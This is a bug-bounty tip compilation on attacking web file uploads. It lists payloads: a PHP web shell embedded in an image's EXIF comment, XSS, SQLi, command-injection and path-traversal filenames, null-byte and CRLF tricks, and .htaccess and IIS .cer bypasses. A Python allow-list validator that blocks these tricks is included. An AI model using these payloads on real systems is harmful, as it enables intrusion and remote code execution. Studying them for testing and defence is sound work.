Book of BugBounty Tips

File Upload



  • Payloads -

  • Bypass File Upload Filtering In image: exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' shell.jpg, then mv shell.jpg shell.php.jpg

Chaining file uploads with other vulns. Set the filename to:

  • ../../../tmp/lol.png for path traversal
  • sleep(10)-- -.jpg for SQLi
  • <svg onload=alert(document.domain)>.jpg/png for XSS
  • ; sleep 10; for command injection

Want to bypass a file extension restriction? Try HTTP Parameter Pollution on the filename parameter.


#BugBountyProTip Some caching servers cache files larger than 2 MB. If the app accepts file uploads, upload a large file and access it multiple times while logged in. It will be cached. Then access it without login, and bingo! Unauthenticated access to sensitive files!
Uploader vuln:
Content-Disposition: form-data; name="FactorImage"; filename="Untitled.jpg\test.aspx"
Content-Type: image/jpeg
Response: {"StoreHousePicture_File":"test.aspx","Success":true} #BugBounty
https://anotherhackerblog.com/exploiting-file-uploads-pt1/
https://anotherhackerblog.com/exploiting-file-uploads-pt-2/
https://github.com/1N3/IntruderPayloads/tree/master/Uploads
Bypassing most file upload filters for $$$$:
  • .htaccess <- upload htaccess
  • file.svg <- uploading svg = xss
  • file.SVg <- must try case mismatch
  • file.png.svg
  • file.php%00.png
  • file.png' or '1'='1
  • ../../file.png
  • file.'svg <- invalid ext.
#bugbountytips #BugBounty
Time for another #BugBountyTip: While testing file upload forms on IIS7 servers, you can get RCE by uploading ".cer" files if the ".asp" extension is blacklisted. This has already led me to multiple RCEs in #bugbounty and #pentest projects. #bugbountytips RT if you love! More coming.
#BugBounty If you find a file upload function for an image, try introducing an image with XSS in the filename, like so:
  • <img src=x onerror=alert('XSS')>.png
  • "><img src=x onerror=alert('XSS')>.png
  • "><svg onmouseover=alert(1)>.svg
  • <<script>alert('xss')<!--a-->a.png
Bypassing file content restrictions: in some cases you can do a CRLF injection via the filename x.png%22%0d%0a%0d%0a%0d%0a<script>alert(1)</script>; this will cause Content-Disposition to throw its content into the file. #bugbounty #xss #crlfinjection #bugbountytip
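Nearly every filename trick on this page (traversal, double and case-mismatched extensions, %00, quotes and angle brackets, CRLF, .htaccess) is defeated by one strict allow-list check on the server. The validator below is an added example written for this page, not code from the book or any quoted hunter; the ALLOWED_EXT and MAGIC tables are assumed minimal sets for a hypothetical image endpoint.

```python
import re

# Assumed allow-list for a hypothetical image-upload endpoint.
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}

# Leading bytes each allowed type must start with (assumed minimal set).
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff",
         "jpeg": b"\xff\xd8\xff", "gif": b"GIF8"}

STEM_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def validate_filename(name: str) -> str:
    """Return a normalised 'stem.ext' or raise ValueError.

    Rejects NUL/CR/LF (the %00 and CRLF-in-filename tricks), path separators
    (../../lol.png, Untitled.jpg\\test.aspx), dot-files (.htaccess), multiple
    extensions (file.php.jpg, file.png.svg), unknown or mangled extensions
    (file.svg, file.'svg, file.png' or '1'='1) and any stem that is not plain
    [A-Za-z0-9_-] (<svg onload=...>, sleep(10)-- -, ; sleep 10;).
    Run it on every value of the filename parameter, not just the first one,
    so parameter pollution cannot slip a second name past it.
    """
    if any(c in name for c in "\x00\r\n/\\"):
        raise ValueError("control character or path separator in filename")
    parts = name.strip().split(".")
    if len(parts) != 2 or not parts[0]:
        raise ValueError("need exactly 'stem.ext' with a non-empty stem")
    stem, ext = parts[0], parts[1].lower()   # lower() defeats file.SVg
    if ext not in ALLOWED_EXT:
        raise ValueError(f"extension {ext!r} not in allow-list")
    if not STEM_RE.fullmatch(stem):
        raise ValueError("stem contains characters outside [A-Za-z0-9_-]")
    return f"{stem}.{ext}"


def validate_upload(name: str, data: bytes) -> str:
    """Check the name and that the content starts like the claimed type.

    A PHP payload hidden in an EXIF comment still passes this byte check;
    the defence for that case is storing uploads under a server-generated
    name in a directory that no script handler ever executes.
    """
    safe = validate_filename(name)
    if not data.startswith(MAGIC[safe.rsplit(".", 1)[1]]):
        raise ValueError("content does not match extension")
    return safe


def is_rejected(name, data=None) -> bool:
    """True if the validator refuses this filename (and content, if given)."""
    try:
        validate_upload(name, data) if data is not None else validate_filename(name)
    except ValueError:
        return True
    return False
```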
RT@CyberSecurityN8: RT@infosecsanyam: RT@th3cyb3rc0p: RT@M404ntf: If a web application allows you to upload a .zip file, zip:// is an interesting PHP wrapper to turn an LFI into an RCE. #BugBounty #BugBountyTips #InfoSec